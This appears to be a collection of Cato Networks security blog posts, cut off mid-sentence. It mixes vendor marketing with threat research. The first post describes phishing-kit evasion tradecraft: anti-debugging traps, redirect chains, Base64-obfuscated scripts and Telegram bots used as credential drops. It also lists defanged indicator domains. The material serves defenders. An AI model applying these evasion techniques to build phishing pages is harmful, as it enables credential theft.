Evasive Phishing Kits Exposed: Cato Networks’ In-Depth Analysis and Real-Time Defense Phishing remains an ever persistent and grave threat to organizations, serving as the primary conduit for infiltrating network infrastructures and pilfering valuable credentials. According to an FBI report phishing is ranked number 1 in the top five Internet crime types. Recently, the Cato Networks Threat Research team analyzed and mitigated through our IPS engine multiple advanced Phishing Kits, some of which include clever evasion techniques to avoid detection.In this analysis, Cato Networks Research Team exposes the tactics, techniques, and procedures (TTPs) of the latest Phishing Kits. Here are four recent instances where Cato successfully thwarted phishing attempts in real-time: Case 1: Mimicking Microsoft Support When a potential victim clicks on an email link, they are led to a web page presenting an 'Error 403' message, accompanied by a link purportedly connecting them to Microsoft Support for issue resolution, as shown in Figure 2 below: Figure 2 - Phishing Landing Page Upon clicking "Microsoft Support," the victim is redirected to a deceptive page mirroring the Microsoft support center, seen in Figure 3 below: Figure 3 – Fake Microsoft Support Center Website Subsequently, when the victim selects the "Microsoft 365” Icon or clicks the “Signin" button, a pop-up page emerges, offering the victim a choice between "Home Support" and "Business Support”, shown in Figure 4 below: Figure 4 – Fake Support Links Opting for "Business Support" redirects them to an exact replica of a classic O365 login page, which is malicious of course, illustrated in Figure 5 below: Figure 5 – O365 Phishing Landing Page Case 2: Rerouting and Anti-Debugging Measures In this scenario, a victim clicks on an email link, only to find themselves directed to an FUD phishing landing page, as illustrated in Figure 6 below. Upon scrutinizing the domain on Virus Total, it's noteworthy that none of the vendors have flagged this domain as phishing. The victim is seamlessly rerouted through a Cloudflare captcha, a strategic measure aimed at thwarting Anti-Phishing crawlers, like urlscan.io. Figure 6 – FUD Phishing Landing Page In this example we’ll dive into the anti-debugging capabilities of this phishing kit. Oftentimes, security researchers will use the browser’s built-in “Developer Tools” on suspicious websites, allowing them to dig into the source code and analyze it.The phishing kit has cleverly integrated a function featuring a 'debugger' statement, typically employed for debugging purposes. Whenever a JavaScript engine encounters this statement, it abruptly halts the execution of the code, establishing a breakpoint. Attempting to resume script execution triggers the invocation of another such function, aimed at thwarting the researcher's debugging efforts, as illustrated in Figure 7 below. Figure 7 – Anti-Debugging Mechanism Figure 8 – O365 Phishing Landing PageAlternatively, phishing webpages employ yet another layer of anti-debugging mechanisms. Once debugging mode is detected, a pop-up promptly emerges within the browser. This pop-up redirects any potential security researcher to a trusted and legitimate domain, such as microsoft.com. This is yet another means to ensure that the researcher is unable to access the phishing domain, as illustrated below: Case 3: Deceptive Chain of Redirection In this intriguing scenario, the victim was led to a deceptive Baidu link, leading him to access a phishing webpage. However, the intricacies of this attack go deeper.Upon accessing the Baidu link, the victim is redirected to a third-party resource that is intended for anti-debugging purposes. Subsequently, the victim is redirected to the O365 phishing landing page. This redirection chain serves a dual purpose. It tricks the victim into believing they are interacting with a legitimate domain, adding a layer of obfuscation to the malicious activities at play. To further complicate matters, the attackers employ a script that actively checks for signs of security researchers attempting to scrutinize the webpage and then redirect the victim to the phishing landing page in a different domain, as demonstrated in Figure 9 below from urlscan.io: Figure 9 – Redirection Chain The third-party domain plays a pivotal role in this scheme, housing JavaScript code that is obfuscated using Base64 encoding, as revealed in Figure 10: Figure 10 – Obfuscated JavaScript Upon decoding the Base64 script, its true intent becomes apparent. The script is designed to detect debugging mode and actively prevent any attempts to inspect the resource, as demonstrated in Figure 11 below: Figure 11 – De-obfuscated Anti-Debugging Script [boxlink link="https://catonetworks.easywebinar.live/registration-network-threats-attack-demonstration"] Network Threats: A Step-by-step Attack Demonstration | Register Now [/boxlink] Case 4: Drop the Bot! A key component of a classic Phishing attack is the drop URL. The attack's drop is used as a collection point for stolen information. The drop's purpose is to transfer the victim's compromised credentials into the attack's “Command and Control” (C2) panel once the user submits their personal details into the fake website's fields. In many cases, this is achieved by a server-side capability, primarily implemented using languages like PHP, ASP, etc., which serves as the backend component for the attack.There are two common types of Phishing drops:- A drop URL hosted on the relative path of the phishing attack's server.- A remote drop URL hosted on a different site than the one hosting the attack itself.One drop to rule them all - An attacker can leverage one external drop in multiple phishing attacks to consolidate all the phished credentials into one Phishing C2 server and make the adversary's life easier.A recent trend involves using the Telegram Bot API URL as an external drop, where attackers create Telegram bots to facilitate the collection and storage of compromised credentials. In this way, the adversary can obtain the victim's credentials directly, even to their mobile device, anywhere and anytime, and can conduct the account takeover on the go. In addition to its effectiveness in aiding attackers, this method also facilitates evasion of Anti-Phishing solutions, as dismantling Telegram bots proves to be a challenging task. Bot Creation Stage Credentials Submission Receiving credentials details of the victim on the mobile How Cato protects you against FUD (Fully Undetectable) Phishing With Cato's FUD Phishing Mitigation, we offer organizations a dynamic and proactive defense against a wide spectrum of phishing threats, ensuring that even the most sophisticated attackers are thwarted at every turn. Cato’s Security Research team uses advanced tools and strategies to detect, analyze, and build robust protection against the latest Phishing threats.Our protective measures leverage advanced heuristics, enabling us to discern legitimate webpage elements camouflaged in malicious sites. For instance, our system can detect anomalies like a genuine Office365 logo embedded in a site that is not affiliated with Microsoft, enhancing our ability to safeguard against such deceptive tactics. Furthermore, Cato employs a multi-faceted approach, integrating Threat Intelligence feeds and Newly Registered domains Identification to proactively block phishing domains. Additionally, our arsenal includes sophisticated machine learning (ML) models designed to identify potential phishing sites, including specialized models to detect Cybersquatting and domains created using Domain Generation Algorithms (DGA). The example below taken from Cato’s XDR, is just a part of an arsenal of tools used by the Cato Research Team, specifically showing auto-detection of a blocked Phishing attack by Cato’s Threat Prevention capabilities. IOCs: leadingsafecustomers[.]com Reportsecuremessagemicrosharepoint[.]kirkco[.]us baidu[.]com/link?url=UoOQDYLwlqkXmaXOTPH-yzlABydiidFYSYneujIBjalSn36BarPC6DuCgIN34REP Dandejesus[.]com bafkreigkxcsagdul5r7fdqwl4i4zg6wcdklfdrtu535rfzgubpvvn65znq[.]ipfs.dweb[.]link 4eac41fc-0f4f23a1[.]redwoodcu[.]live Redwoodcu[.]redwoodcu[.]live

Lessons on Cybersecurity from Formula E

The ABB FIA Formula E World Championship is an exciting evolution of motorsports, having launched its first season of single-seater all-electric racing in 2014. The... Read ›
Lessons on Cybersecurity from Formula E The ABB FIA Formula E World Championship is an exciting evolution of motorsports, having launched its first season of single-seater all-electric racing in 2014. The first-generation cars featured a humble 200kW of power but as technology has progressed, the current season Gen3 cars now have 350kW. Season 10 is currently in progress with 16 global races, many taking place on street circuits. Manufacturers such as Porsche, Jaguar, Maserati, Nissan, and McLaren participate, and their research and development for racing benefits design and production of consumer electric vehicles. Racing electric cars adds additional complexity when compared to their internal combustion counterparts, success relies heavily on teamwork, strategy, and reliable data. Most notable is the simple fact that each car does not have enough total power capacity to complete a race. Teams must balance speed with regenerating power if they want to finish the race, using data to shape the strategy that will hopefully land their drivers on the podium. Building an effective cybersecurity strategy draws many parallels with the high-pressure world of Formula E racing. CISOs rely on accurate and timely data to manage their limited resources: time, people, and money to stay ahead of bad actors and emerging threats. Technology investments designed to increase security posture could require too many resources, leaving organizations unable to fully execute their strategy. Adding to the excitement and importance of strategy in Formula E racing is “Attack Mode.” Drivers can activate attack mode at a specific section of the track, delivering an additional 50kW of power twice per race for up to eight minutes total. Attack mode rewards teams that can effectively use the real-time telemetry collected from the cars to plan the best overall strategy. Using Attack mode too early or too late can significantly impact where the driver places at the race's end. [boxlink link="https://catonetworks.easywebinar.live/registration-simplicity-at-speed"] Simplicity at Speed: How Cato’s SASE Drives the TAG Heuer Porsche Formula E Team’s Racing | Watch Now [/boxlink] In a similar way, SASE is Attack Mode for enterprise cybersecurity and networking. Organizations that properly strategize and adopt cloud-native SASE solutions that fully converge networking and security gain powerful protection and visibility against threats, propelling their security postures forward in the never-ending race against bad actors. While the overall strategy is still critical to success, SASE provides superior data quality for investigation and remediation, but also allows faster and more accurate decision making. As mentioned above, cars like the TAG Heuer Porsche Formula E Team’s Porsche 99x Electric have increased significantly in power over time, and this should also be true of SASE platforms. At Cato Networks, we deliver more than 3,000 product enhancements every year, including completely new capabilities. The goal is not to have the most features, but, like the automotive manufacturers mentioned previously, to build the right capabilities in a usable way. Cybersecurity requires balancing of multiple factors to deliver the best outcomes and protections; like Formula E, speed is important, but so is reliability and visibility. Consider that every SASE vendor is racing for your business, but not all of them can successfully deliver in all the areas that will make your strategy a success. Pay keen attention to traffic performance, intelligent visibility that helps you to identify and remediate threats, global presence, and the ability of the vendor to deliver meaningful new capabilities over time rather than buzzwords and grandiose claims. After all, in any race the outcomes are what matter, and we all want to be on the podium for making our organizations secure and productive. Cato Networks is proud to be the official SASE partner of the TAG Heuer Porsche Formula E Team, learn more about this exciting partnership here: https://www.catonetworks.com/porsche-formula-e-team/

WANTED: Brilliant AI Experts Needed for Cyber Criminal Ring

In a recent ad on a closed Telegram channel, a known threat actor has announced it’s recruiting AI and ML experts for the development of... Read ›
WANTED: Brilliant AI Experts Needed for Cyber Criminal Ring In a recent ad on a closed Telegram channel, a known threat actor has announced it’s recruiting AI and ML experts for the development of it’s own LLM product. Threat actors and cybercriminals have always been early adapters of new technology: from cryptocurrencies to anonymization tools to using the Internet itself. While cybercriminals were initially very excited about the prospect of using LLMs (Large Language Models) to support and enhance their operations, reality set in very quickly – these systems have a lot of problems and are not a “know it all, solve it all” solution. This was covered in one of our previous blogs, where we reported a discussion about this topic in a Russian underground forum, where the conclusion was that LLMs are years away from being practically used for attacks. The media has been reporting in recent months on different ChatGPT-like tools that threat actors have developed and are being used by attackers, but once again, the reality was quite different. One such example is the wide reporting about WormGPT, a tool that was described as malicious AI tool that can be used for anything from disinformation to actual attacks. Buyers of this tool were not impressed with it, seeing it was just a ChatGPT bot with the same restrictions and hallucinations they were familiar with. Feedback about this tool soon followed: [boxlink link="https://www.catonetworks.com/resources/cato-networks-sase-threat-research-report/"] Cato Networks SASE Threat Research Report H2/2022 | Download the Report [/boxlink] With an urge to utilize AI, a known Russian threat actor has now advertised a recruitment message in a closed Telegram channel, looking for a developer to develop their own AI tool, dubbed xGPT. Why is this significant? First, this is a known threat actor that has already sold credentials and access to US government entities, banks, mobile networks, and other victims. Second, it looks like they are not trying to just connect to an existing LLM but rather develop a solution of their own. In this ad, the threat actor explicitly details they are looking to,” push the boundaries of what’s possible in our field” and are looking for individuals who ”have a strong background in machine learning, artificial intelligence, or related fields.” Developing, training, and deploying an LLM is not a small task. How can threat actors hope to perform this task, when enterprises need years to develop and deploy these products? The answer may lie in the recently announced GPTs, the customized ChatGPT agent product announced by OpenAI. Threat actors may create ChatGPT instances (and offer them for sale), that differ from ChatGPT in multiple ways. These differences may include a customized rule set that ignores the restrictions imposed by OpenAI on creating malicious content. Another difference may be a customized knowledge base that may include the data needed to develop malicious tools, evade detection, and more. In a recent blog, Cato Networks threat intelligence researcher Vitaly Simonovich explored the introduction and the possible ways of hacking GPTs. It remains to be seen how this new product will be developed and sold, as well as how well it performs when compared to the disappointing (to the cybercriminals end) introduction of WormGPT and the like. However, we should keep in mind this threat actor is not one to be dismissed and overlooked.

When Patch Tuesday becomes Patch Monday – Friday

If you’re an administrator running Ivanti VPN (Connect Secure and Policy Secure) appliances in your network, then the past two months have likely made you... Read ›
When Patch Tuesday becomes Patch Monday – Friday If you’re an administrator running Ivanti VPN (Connect Secure and Policy Secure) appliances in your network, then the past two months have likely made you wish you weren't.In a relatively short timeframe bad news kept piling up for Ivanti Connect Secure VPN customers, starting on Jan. 10th, 2024, when critical and high severity vulnerabilities, CVE-2024-21887 and CVE-2023-46805 respectively, were disclosed by Ivanti impacting all supported versions of the product. The chaining of these vulnerabilities, a command injection weakness and an authentication bypass, could result in remote code execution on the appliance without any authentication. This enables complete device takeover and opening the door for attackers to move laterally within the network. This was followed three weeks later, on Jan. 31st, 2024, by two more high severity vulnerabilities, CVE-2024-21888 and CVE-2024-21893, prompting CISA to supersede its previous directive to patch the two initial CVEs, by ordering all U.S. Federal agencies to disconnect from the network all Ivanti appliances “as soon as possible” and no later than 11:59 PM on February 2nd. As patches were gradually made available by Ivanti, the recommendation by CISA and Ivanti themselves has been to not only patch impacted appliances but to first factory reset them, and then apply the patches to prevent attackers from maintaining upgrade persistence. It goes without saying that the downtime and amount of work required from security teams to maintain the business’ remote access are, putting it mildly, substantial. In today’s “work from anywhere” market, businesses cannot afford downtime of this magnitude, the loss of employee productivity that occurs when remote access is down has a direct impact on the bottom line.Security teams and CISOs running Ivanti and similar on-prem VPN solutions need to accept that this security architecture is fast becoming, if not already, obsolete and should remain a thing of the past. Migrating to a modern ZTNA deployment, more-than-preferably as a part of single vendor SASE solution, has countless benefits. Not only does it immensely increase the security within the network, stopping lateral movement and limiting the “blast radius” of an attack, but it also serves to alleviate the burden of patching, monitoring and maintaining the bottomless pit of geographically distributed physical appliances from multiple vendors. [boxlink link="https://www.catonetworks.com/resources/cato-networks-sase-threat-research-report/"] Cato Networks SASE Threat Research Report H2/2022 | Download the Report [/boxlink] Details of the vulnerabilities CVE-2023-46805: Authentication Bypass (CVSS 8.2)Found in the web component of Ivanti Connect Secure and Ivanti Policy Secure (versions 9.x and 22.x) Allows remote attackers to access restricted resources by bypassing control checks. CVE-2024-21887: Command Injection (CVSS 9.1)Identified in the web components of Ivanti Connect Secure and Ivanti Policy Secure (versions 9.x and 22.x) Enables authenticated administrators to execute arbitrary commands via specially crafted requests. CVE-2024-21888: Privilege Escalation (CVSS 8.8)Discovered in the web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) Permits users to elevate privileges to that of an administrator. CVE-2024-21893: Server-Side Request Forgery (SSRF) (CVSS 8.2)Present in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x), and Ivanti Neurons for ZTA Allows attackers to access restricted resources without authentication. CVE-2024-22024: XML External Entity (XXE) Vulnerability (CVSS 8.3)Detected in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x), and ZTA gateways Permits unauthorized access to specific restricted resources. Specifically, by chaining CVE-2023-46805, CVE-2024-21887 & CVE-2024-21893 attackers can bypass authentication, and obtain root privileges on the system, allowing for full control of the system. The first two CVEs were observed being chained together in attacks going back to December 2023, i.e. well before the publication of the vulnerabilities.With estimates of internet connected Ivanti VPN gateways ranging from ~20,000 (Shadowserver) all the way to ~30,000 (Shodan) and with public POCs being widely available it is imperative that anyone running unpatched versions applies them and follows Ivanti’s best practices to make sure the system is not compromised. Conclusion In times when security & IT teams are under more pressure than ever to make sure business and customer data are protected, with CISOs possibly even facing personal liability for data breaches, it’s become imperative to implement comprehensive security solutions and to stop duct-taping various security solutions and appliances in the network. Moving to a fully cloud delivered single vendor SASE solution, on top of providing the full suite of modern security any organization needs, such as ZTNA, SWG, CASB, DLP, and much more, it greatly reduces the maintenance required when using multiple products and appliances. Quite simply eliminating the need to chase CVEs, applying patches in endless loops and dealing with staff burnout. The networking and security infrastructure is consumed like any other cloud delivered service, allowing security teams to focus on what’s important.

Demystifying GenAI security, and how Cato helps you secure your organizations access to ChatGPT

Over the past year, countless articles, predictions, prophecies and premonitions have been written about the risks of AI, with GenAI (Generative AI) and ChatGPT being... Read ›
Demystifying GenAI security, and how Cato helps you secure your organizations access to ChatGPT Over the past year, countless articles, predictions, prophecies and premonitions have been written about the risks of AI, with GenAI (Generative AI) and ChatGPT being in the center. Ranging from its ethics to far reaching societal and workforce implications (“No Mom, The Terminator isn’t becoming a reality... for now”).Cato security research and engineering was so fascinated about the prognostications and worries that we decided to examine the risks to business posed by ChatGPT. What we found can be summarized into several key conclusions: There is presently more scaremongering than actual risk to organizations using ChatGPT and the likes. The benefits to productivity far outweigh the risks. Organizations should nonetheless be deploying security controls to keep their sensitive and proprietary information from being used in tools such as ChatGPT since the threat landscape can shift rapidly. Concerns explored A good deal of said scaremongering is around the privacy aspect of ChatGPT and the underlying GenAI technology.  The concern -- what exactly happens to the data being shared in ChatGPT; how is it used (or not used) to train the model in the background; how it is stored (if it is stored) and so on. The issue is the risk of data breaches and data leaks of company’s intellectual property when users interact with ChatGPT. Some typical scenarios being: Employees using ChatGPT – A user uploads proprietary or sensitive information to ChatGPT, such as a software engineer uploading a block of code to have it reviewed by the AI. Could this code later be leaked through replies (inadvertently or maliciously) in other accounts if the model uses that data to further train itself?Spoiler: Unlikely and no actual demonstration of systematic exploitation has been published. Data breaches of the service itself – What exposure does an organization using ChatGPT have if OpenAI is breached, or if user data is exposed through bugs in ChatGPT? Could sensitive information leak this way?Spoiler: Possibly, at least one public incident was reported by OpenAI in which some users saw chat titles of other users in their account due to a bug in OpenAI’s infrastructure. Proprietary GenAI implementations – AI already has its own dedicated MITRE framework of attacks, ATLAS, with techniques ranging from input manipulation to data exfiltration, data poisoning, inference attacks and so on. Could an organization's sensitive data be stolen though these methods?Spoiler: Yes, methods range from harmless, to theoretical all the way to practical, as showcased in a recent Cato Research post on the subject, in any case securing proprietary implementation of GenAI is outside the scope of this article. There’s always a risk in everything we do. Go onto the internet and there’s also a risk, but that doesn’t stop billions of users from doing it every day. One just needs to take the appropriate precautions. The same is true with ChatGPT.  While some scenarios are more likely than others, by looking at the problem from a practical point of view one can implement straightforward security controls for peace of mind. [boxlink link="https://catonetworks.easywebinar.live/registration-everything-you-wanted-to-know-about-ai-security"] Everything You Wanted To Know About AI Security But Were Afraid To Ask | Watch the Webinar [/boxlink] GenAI security controls In a modern SASE architecture, which includes CASB & DLP as part of the platform, these use-cases are easily addressable. Cato’s platform being exactly that, it offers a layered approach to securing usage of ChatGPT and similar applications inside the organization: Control which applications are allowed, and which users/groups are allowed to use those applications Control what text/data is allowed to be sent Enforcing application-specific options, e.g. opting-out of data retention, tenant control, etc. The initial approach is defining what AI applications are allowed and which user groups are allowed to use them, this can be done by a combination of using the “Generative AI Tools” application category with the specific tools to allow, e.g., blocking all GenAI tools and only allowing "OpenAI". A cornerstone of an advanced DLP solution is its ability to reliably classify data, and the legacy approaches of exact data matches, static rules and regular expressions are now all but obsolete when used on their own. For example, blocking a credit card number would be simple using a regular expression but in real-life scenarios involving financial documents there are many other means by which sensitive information can leak. It would be nearly pointless to try and keep up with changing data and fine-tuning policies without a more advanced solution that just works. Luckily, that is exactly where Cato’s ML (Machine Learning) Data Classifiers come in. This is the latest addition to Cato’s already expansive array of AI/ML capabilities integrated into the platform throughout the years. Our in-house LLM (Large Language Model), trained on millions of documents and data types, can natively identify documents in real-time, serving as the perfect tool for such policies.Let’s look at the scenario of blocking specific text input with ChatGPT, for example uploading confidential or sensitive data through the prompt. Say an employee from the legal department is drafting an NDA (non-disclosure agreement) document and before finalizing it gives it to ChatGPT to go over it and suggest improvement or even just go over the grammar. This could obviously be a violation of the company’s privacy policies, especially if the document contains PII. Figure 1 - Example rule to block upload of Legal documents, using ML Classifiers We can go deeper To further demonstrate the power and flexibility of a comprehensive CASB solution, let us examine an additional aspect of ChatGPT’s privacy controls. There is an option in the settings to disable “Chat history & training”, essentially letting the user decide that he does not want his data to be used for training the model and retained on OpenAI’s servers.This important privacy control is disabled by default, that is by default all chats ARE saved by OpenAI, aka users are opted-in, something an organization should avoid in any work-related activity with ChatGPT. Figure 2 - ChatGPT's data control configuration A good way to strike a balance between allowing users the flexibility to use ChatGPT but under stricter controls is only allowing chats in ChatGPT that have chat history disabled. Cato’s CASB granular ChatGPT application allows for this flexibility by being able to distinguish in real-time if a user is opted-in to chat history and block the connection before data is sent. Figure 3 – Example rule for “training opt-out” enforcement Lastly, as an alternative (or complementary) approach to the above, it is possible to configure Tenant Control for ChatGPT access, i.e., enforce which accounts are allowed when accessing the application. In a possible scenario an organization has corporate accounts in ChatGPT, where they have default security and data control policies enforced for all employees, and they would like to make sure employees do not access ChatGPT with their personal accounts on the free tier. Figure 4 - Example rule for tenant control To learn more about Cato’s CASB and DLP visit: https://www.catonetworks.com/platform/cloud-access-security-broker-casb/ https://www.catonetworks.com/platform/data-loss-prevention-dlp/

Fake Data Breaches: Why They Matter and 12 Ways to Deal with Them

As a Chief Information Security Officer (CISO), you have the enormous responsibility to safeguard your organization’s data. If you’re like most CISOs, your worst fear... Read ›
Fake Data Breaches: Why They Matter and 12 Ways to Deal with Them As a Chief Information Security Officer (CISO), you have the enormous responsibility to safeguard your organization's data. If you're like most CISOs, your worst fear is receiving a phone call in the middle of the night from one of your information security team members informing you that the company's data is being sold on popular hacking forums. This is what happened recently with Europcar, part of the Europcar Mobility Group and a leading car and light commercial vehicle rental company. The company found that nearly 50 million customer records were for sale on dark web. But what was even stranger was that after a quick investigation, the company found that the data being sold was fake. A relief, no doubt, but even fake data should be a concern for CISO. Here's why and what companies can do to protect themselves. A screenshot from an online hacking forum indicating a data breach at Europcar.com, with a user named "lean" offering personal data from 50 million users for sale. Why Care About Fake Data? The main reason for selling fake data from a "breach" is to make money, often in ways potentially unrelated to the target enterprises. But even when attackers are profiting in a way that doesn’t seem to harm the enterprise, CISOs need to be concerned as attackers may have other reasons for their actions such as: Distraction and Misdirection: By selling fake data, threat actors could attempt to distract the company's security team. While the team is busy verifying the authenticity of the data, the attackers might be conducting a more severe and real attack elsewhere in the system. Testing the Waters: Sometimes, fake data breaches can be a way for hackers to gauge the response time and protocols of a company's security team. This can provide them valuable insights into the company's defenses and preparedness, which they could exploit in future, more severe attacks. Building a reputation: Reputation is highly esteemed in hacker communities, earned through past successes and perceived information value. While some may use fabricated data to gain notoriety, the risks of being caught and subsequently ostracized are significant. Maintaining a reputable standing requires legitimate skills and access to authentic information. Damage the company's reputation: Selling fake data can also be a tactic to undermine trust in a company. Even if the data is eventually revealed to be bogus, the initial news of a breach can damage the company's reputation and erode customer confidence. Market Manipulation: In cases where the company is publicly traded, news of a data breach (even a fake one) can impact stock prices. This can be exploited by threat actors looking to manipulate the market for financial gain. How are threat actors generating fake data? Fake data is often used in software development when the software engineer needs to test the application's API to check that it works. There are multiple ways to generate data from websites like https://generatedata.com/ to Python libraries like https://faker.readthedocs.io/en/master/index.html. But to make the data "feel" real and personalized to the target company, hackers are using LLMs like ChatGPT or Claude to generate more realistic datasets like using the same email format as the company. More professional attackers will first do a reconnaissance of the company. The threat actor can then provide more information to the LLM and generate realistic-looking and personalized data based on the reconnaissance. The use of LLMs makes the process much easier and more accurate. Here is a simple example: A screenshot of ChatGPT displaying an example of creating fake company data using information from reconnaissance. [boxlink link="https://www.catonetworks.com/resources/cato-networks-sase-threat-research-report/"] Cato Networks SASE Threat Research Report H2/2022 | Download the Report [/boxlink] What can you do in such a situation? In the evolving landscape of cyber threats, CISOs must equip their teams with a multi-faceted approach to tackle fake data breaches effectively. This approach encompasses not just technical measures but also organizational preparedness, staff awareness, legal strategies, and communication policies. By adopting a holistic strategy that covers these diverse aspects, companies can ensure a rapid and coordinated response to both real and fake data breaches, safeguarding their integrity and reputation. Here are some key measures to consider in building such a comprehensive defense strategy: Rapid Verification: Implement processes for quickly verifying the authenticity of alleged data breaches. This involves having a dedicated team or protocol for such investigations. Educate Your Staff: Regularly educate and train your staff about the possibility of fake data breaches and the importance of not panicking and following protocol. Enhance Monitoring and Alert Systems: Strengthen your monitoring systems to detect any unusual activity that could indicate a real threat, even while investigating a potential fake data breach. Establish Clear Communication Channels: Ensure clear and efficient communication channels within your organization for reporting and discussing potential data breaches. Monitor hacker communities: Stay connected with cybersecurity communities and forums to stay informed about the latest trends in fake data breaches and threat actor tactics. Legal Readiness: Be prepared to engage legal counsel to address potential defamation or misinformation spread due to fake data breaches. Public Relations Strategy: Develop a strategy for quickly and effectively communicating with stakeholders and the public to mitigate reputation damage in case of fake breach news. Conduct Regular Security Audits: Regularly audit your security systems and protocols to identify and address any vulnerabilities. Backup and Disaster Recovery Plans: Maintain robust backup and disaster recovery plans to ensure business continuity in case of any breach, real or fake. Collaborate with Law Enforcement: In cases of fake breaches, collaborate with law enforcement agencies to investigate and address the source of the fake data. Use Canary Tokens: Implement canary tokens within your data sets. Canary tokens are unique, trackable pieces of information that act as tripwires. In the event of a data breach, whether real or fake, you can quickly identify the breach through these tokens and determine the authenticity of the data involved. This strategy not only aids in early detection but also in the rapid verification of data integrity. Utilize Converged Security Solutions: Adopt solutions like Secure Access Service Edge (SASE) that provide comprehensive security by correlating events across your network. This streamlined approach offers clarity on security incidents, helping distinguish real threats from false alarms efficiently. As technology advances, cybercriminals are also becoming more sophisticated in their tactics. Although fake data breaches may seem less harmful, they pose significant risks to businesses in terms of resource allocation, reputation, and security posture. To strengthen their defenses against cyber threats, enterprises need a proactive approach that involves rapid verification, staff education, enhanced monitoring, legal readiness, and the strategic use of SASE. It’s not just about responding to visible threats but also about preparing for the deception and misdirection that we cannot see. By doing so, CISOs and their teams become not just protectors of their organization’s digital assets but also smart strategists in the ever-changing game of cybersecurity.

The Platform Matters, Not the Platformization  

Cyber security investors, vendors and the press are abuzz with a new concept introduced by Palo Alto Networks (PANW) in their recent earnings announcement and... Read ›
The Platform Matters, Not the Platformization   Cyber security investors, vendors and the press are abuzz with a new concept introduced by Palo Alto Networks (PANW) in their recent earnings announcement and guidance cut: Platformization. PANW rightly wants to address the “point solutions fatigue” experienced by enterprises due to the “point solution for point problem” mentality that has been prevalent in cyber security over the years. Platformization, claims PANW, is achieved by consolidating current point solutions into PANW platforms, thus reducing the complexity of dealing with multiple solutions from multiple vendors. To ease the migration, PANW offer customers to use its products for free for up to 6 months while the displaced products contracts expire.  We couldn’t agree more with the need for point solution convergence to address customers’ challenges to sustain their disjointed networking and security infrastructure.  Cato was founded nine years ago with the mission to build a platform to converge multiple networking and security categories. Today, over 2200 enterprise customers enjoy the transformational benefits of the Cato SASE Cloud platform that created the SASE category.   Does PANW have a SASE platform? Many legacy vendors, including PANW and most notably Cisco, have grown through M&A establishing a portfolio of capabilities and a business one-stop-shop. Integrating these acquisitions and OEMs into a cohesive and converged platform is, however, extremely difficult to do across code bases, form factors, policy engines, data lakes, and release cycles. What PANW has today is a collection of point solutions with varying degrees of integration that still require a lot of complex care and feeding from the customer. In my opinion, PANW’s approach is more “portfolio-zation” than “platformization,” but I digress.  [boxlink link="https://www.catonetworks.com/resources/the-complete-checklist-for-true-sase-platforms/"] The Complete Checklist for True SASE Platforms | Download the eBook [/boxlink] The solution to the customer-point-solution-malaise lies with a true platform architected from the ground up to abstract complexity. When customers look at the Cato platform, they see a way to transform how their IT teams secure and optimize the business. Cato provides a broad set of security capabilities, governed by one global policy engine, autonomously maintained for maximum availability and scalability, peak performance, and optimal security posture and available anywhere in the world. To deliver this IT “superpower” requires a platform, not “platformization.”   For several years, we have been offering customers ways to ease the migration from their point solutions towards a better outcome. We have displaced many point solutions in most of our customers including MPLS services, firewalls, SWG, CASB/DLP, SD-WAN, and remote access solutions across all vendors – including PANW. Customers make this strategic SASE transformation decision not primarily because we incentivize them, but because they understand the qualitative difference between the Cato SASE Platform and their current state.   PANW can engage customers with their size and brand, not with a promise to truly change their reality. If you want to see how a true SASE platform transforms IT functionally, operationally, commercially, and even personally – take Cato for a test drive.  

CloudFactory Eliminates “Head Scratching” with Cato XDR

More than just introducing XDR today, Cato announced the first XDR solution to be built on a SASE platform. Tapping the power of the platform... Read ›
CloudFactory Eliminates “Head Scratching” with Cato XDR More than just introducing XDR today, Cato announced the first XDR solution to be built on a SASE platform. Tapping the power of the platform dramatically improves XDR's quality of insight and the ease of incident response, leading to faster incident remediation. "The Cato platform gives us peace of mind," says Shayne Green, an early adopter of Cato XDR and Head of security operations at CloudFactory. CloudFactory is a global outsourcer where Green and his team are responsible for ensuring the security of up to 8,000 remote analysts ("cloud workers" in CloudFactory parlance) worldwide. "When you have multiple services, each providing a particular component to serve the organization’s overall security needs, you risk duplicating functionality. The primary function of one service may overlap with the secondary function of another. This leads to inefficient service use. Monitoring across the services also becomes a headache, with manual processes often required due to inconsistent integration capabilities. To have a platform where all those capabilities are tightly converged together makes for a huge win," says Green. Why CloudFactory Deployed Cato XDR Cato XDR is fed by the platform's set of converged security and network sensors, 8x more native data sources than XDR solutions built on a vendor's EPP solution alone. The platform also delivers a seamless interface for remediating incidents, including new Analyst Workbenches and proven incident response playbooks for fast incident response. From policy configuration to monitoring to threat management and incident detection, enterprises gain one seamless experience. "Cato XDR gives us a clear picture of the security events and alerts," says Green. "Trying to pick that apart through multiple platforms is head-scratching and massively resource intensive," he says. Before Cato, XDR would have been infeasible for CloudFactory. "We would need to have all the right sensors deployed for our sites and remote users across the globe. That would have been a costly exercise and very difficult to maintain. We would also have needed to ingest that data into a common datastore, normalize the data in a way that doesn't degrade its quality, and only then could we begin to operate on the data. It would be a massive effort to do it right; Cato has given us all that instantly," he says. Cato XDR Streamlines CloudFactory’s Business Collaboration With Cato XDR deployed, Green found information that proved helpful at an operational level. "We knew that some BitTorrent was running on our network, but Cato XDR showed us how much, summarizing all the information in one place and other types of threats. With the evidence consolidated on a screen, we can easily see the scale of an issue. The new AI summary feature helps to automate a routine task. "We just snip-and-send the text describing the story for our internal teams to act on. The AI summary provides a very clear and simple articulation of the issue\finding. This saves us from manually formulating reports and evidence summaries." "Having a central presentation layer of our security services along with instant controls to remediate issues is of obvious benefit " he says. "We can report on millions of daily events to show device and user activity, egress points, ISP details, application use, throughput rates, security threats and more.  We can see performance pinch points, investigate anomalous traffic and application access, and respond accordingly. The power of the information and the way it is presented makes the investigations very simple. Through the workbench stories feature, we follow the breadcrumb trail through the verbose data sets all the way to a conclusion. It's actually a fun feature to use and has provided powerful results - which is super useful across a distributed workforce." [boxlink link="https://www.catonetworks.com/resources/the-industrys-first-sase-based-xdr-has-arrived/"] The Industry’s First SASE-based XDR Has Arrived | Download the eBook [/boxlink] "Before Cato, we would often be scratching our heads trying to obtain meaningful information from multiple platforms and spending a lot of time doing it. The alternative would be very fragmented and sometimes fairly brittle due to the way sets of information would have to be stitched together. With Cato, we don't have to do that. It's maintained for us, and the information is on tap." The Platform: It's More Than Just Technology However, for Green, the notion of a platform extends far beyond the technical delivery of capabilities. "Having a single platform is a no-brainer for us. It's not just the technology. 